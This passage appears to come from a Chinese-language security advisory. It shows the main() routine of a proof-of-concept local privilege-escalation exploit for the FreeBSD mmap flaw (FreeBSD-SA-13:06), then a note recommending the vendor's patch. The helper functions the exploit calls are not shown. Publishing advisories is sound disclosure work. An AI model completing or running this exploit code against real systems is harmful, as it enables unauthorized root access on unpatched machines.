int main(int argc, char** argv, char** envp)
{
int fd = open(TARGET, O_RDONLY);
caddr_t addr = mmap(NULL, LEN, PROT_READ, MAP_SHARED, fd, 0);
pid_t forked_pid = fork();
switch(forked_pid) {
case -1:
return -1;
case 0:
dummy(fd, addr);
break;
default:
munmap(addr, LEN);
close(fd);
kaboom(forked_pid, addr);
wait(NULL);
break;
}
return 0;
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
FreeBSD
-------
FreeBSD已经为此发布了一个安全公告(FreeBSD-SA-13:06.mmap.asc)以及相应补丁:
FreeBSD-SA-13:06.mmap.asc:Privilege escalation via mmap
链接::06.mmap.asc